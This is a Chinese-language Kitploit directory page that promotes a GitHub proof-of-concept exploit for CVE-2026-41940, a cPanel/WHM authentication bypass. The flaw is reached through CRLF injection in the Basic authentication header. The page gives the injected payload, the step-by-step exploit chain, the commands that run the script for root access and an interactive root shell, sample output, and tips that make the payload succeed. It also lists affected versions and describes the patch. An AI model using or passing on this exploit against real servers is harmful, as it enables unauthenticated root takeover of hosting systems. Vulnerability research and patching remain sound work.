Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CPANEL-CVE-2026-41940 — CVE-2026-41940 的概念验证漏洞利用程序,这是一个严重的 cPanel/WHM 身份验证绕过漏洞,通过 CRLF 注入实现,可允许未经身份验证的 root 访问和交互式 shell。 | Kitploit
工具/GitHubGitHub/0xabdoulaye/cpanel-cve-2026-41940
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHub0xabdoulaye/cpanel-cve-2026-41940

CPANEL-CVE-2026-41940

CVE-2026-41940 的概念验证漏洞利用程序,这是一个严重的 cPanel/WHM 身份验证绕过漏洞,通过 CRLF 注入实现,可允许未经身份验证的 root 访问和交互式 shell。

查看仓库
213个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41940 — cPanel/WHM 身份验证绕过

作者: SilySec
原始研究: Sina Kheirkhah (@SinSinology) / watchTowr Labs
严重性: 严重(CVSS 9.8)
类型: CRLF 注入 → 身份验证绕过 → root Shell


描述

CVE-2026-41940 是 cPanel/WHM 中的一个严重漏洞,允许未认证的攻击者通过 cpsrvd 的 Basic 身份验证管理器中的 CRLF 注入获得完整的 root 访问权限。

该漏洞结合了三个弱点:

  1. 未过滤的 CRLF 注入 — 当 cookie 中缺少 <ob> 键时,Cpanel/Session.pm 中的 saveSession() 函数在写入磁盘前未对 \r\n 字符进行清理。
  2. 编码器被禁用 — 没有会话 cookie 中的 <obHEX> 段,按会话编码器不会激活,导致 CRLF 字节以明文形式写入会话文件。
  3. 缓存重新加载 — Cpanel::Session::Modify::save() 重新读取原始文件并将注入的 CRLF 键提升到 JSON 缓存中,使会话完全通过身份验证。

受影响版本


利用链

root@kitploit:~
POST /login/?login_only=1          [错误密码]
  └─► cookie: whostmgrsession=:ID,<obHEX>

删除 ,<obHEX>  →  :ID          [禁用编码器]

GET / + Cookie: :ID
      + Authorization: Basic root:x\r\nhasroot=1\r\n...
  └─► cpsrvd 将原始 CRLF 字节写入会话文件

GET /scripts2/listaccts + Cookie: :ID   [无安全令牌]
  └─► do_token_denied() → Cpanel::Session::Modify::save()
  └─► JSON 缓存以 hasroot=1, tfa_verified=1 重建

→ 会话以 root 身份通过验证

使用方法

前提条件

root@kitploit:~
pip install requests
# 对于 --terminal 模式(可选):
pip install paramiko

漏洞验证

root@kitploit:~
python3 poc.py --target https://TARGET:2087

获取交互式 root Shell

root@kitploit:~
python3 poc.py --target https://TARGET:2087 --terminal

强制使用规范主机名

root@kitploit:~
python3 poc.py --target https://1.2.3.4:2087 --hostname cpanel.example.com

输出示例

root@kitploit:~
[*] target   : https://1.2.3.4:2087
[*] canonical: cpanel.example.com

[1/4] minting preauth session ...
       session  = :AbCdEfGh...,0123456789abcdef
       stripped = :AbCdEfGh...

[2/4] injecting CRLF payload ...
       307 → leaked token = /cpsess1234567890

[3/4] triggering cache propagation ...
       do_token_denied → Cpanel::Session::Modify::save() fired

[4/4] verifying root access ...

  ✔  AUTH BYPASS CONFIRMED
     cPanel version : 11.136.0.5
     cookie         : whostmgrsession=%3AAbCdEfGh...
     WHM URL        : https://1.2.3.4:2087/cpsess1234567890/

重要技术要点

  • 规范主机名必须用于 Host 头(而非 IP)— cpsrvd 根据主机名以不同方式处理会话
  • 载荷中的时间戳必须为 9999999999(固定值,遥远的未来)— 当前时间戳会失败
  • 注入载荷中的键顺序很重要:successful_internal_auth_with_timestamp 必须放在第一位

修复方案

该补丁将 filter_sessiondata() 的调用移至 saveSession() 内部,并在 <ob> 键缺失时添加条件编码,防止任何明文写入。

立即将 cPanel/WHM 更新至上述列出的修复版本。


免责声明

此工具仅供研究和内部测试使用。在未经明确授权的系统上使用属于违法行为。SilySec 对任何滥用行为不承担任何责任。

下载工具
分支最后一个受影响版本修复版本
110.0.x11.110.0.9611.110.0.97
118.0.x11.118.0.6211.118.0.63
126.0.x11.126.0.5311.126.0.54
132.0.x11.132.0.2811.132.0.29
134.0.x11.134.0.1911.134.0.20
136.0.x11.136.0.511.136.0.6